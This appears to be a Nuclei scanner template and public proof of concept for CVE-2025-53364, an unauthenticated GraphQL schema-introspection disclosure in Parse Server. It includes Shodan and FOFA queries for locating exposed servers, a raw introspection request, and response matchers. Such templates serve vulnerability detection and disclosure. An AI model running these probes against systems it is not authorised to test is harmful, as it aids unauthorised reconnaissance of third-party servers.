The Parse Server GraphQL API previously allowed public access to the GraphQL schema without requiring a session token or the master key. While schema introspection reveals only metadata and not actual data, this metadata can still expand the potential attack surface.
PoC代码[已公开]
id: CVE-2025-53364
info:
name: Parse Server - GraphQL Schema Information Disclosure
author: securitytaters
severity: medium
description: |
The Parse Server GraphQL API previously allowed public access to the GraphQL schema without requiring a session token or the master key. While schema introspection reveals only metadata and not actual data, this metadata can still expand the potential attack surface.
reference:
- https://github.com/parse-community/parse-server/security/advisories/GHSA-48q3-prgv-gm4w
- https://www.miggo.io/vulnerability-database/cve/CVE-2025-53364
- https://nvd.nist.gov/vuln/detail/CVE-2025-53364
metadata:
verified: true
max-request: 1
vendor: parseplatform
product: parse-server
shodan-query:
- http.title:"parse server" || "parse-server"
- http.title:"parse dashboard"
fofa-query: title="parse dashboard"
tags: cve,cve2025,parse,graphql,exposure,vuln,vkev
variables:
appid: "{{appid}}"
http:
- raw:
- |
POST /graphql HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
X-Parse-Application-Id: {{appid}}
{"query":"{\n __schema {\n types {\n name\n }\n }\n}"}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{"data":{"__schema":{"types":[{"name":"Upload"},'
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200
# digest: 4a0a00473045022100f90568fe20b5bb95796e71b8a0c64cdcc2ea3b97da35d31888d668b3b06a51b8022062b4b202eb02e0345b5647b00b78f7784cc44437160cbd0238145b8ae1071f87:922c64590222798bb761d5b6d8e72950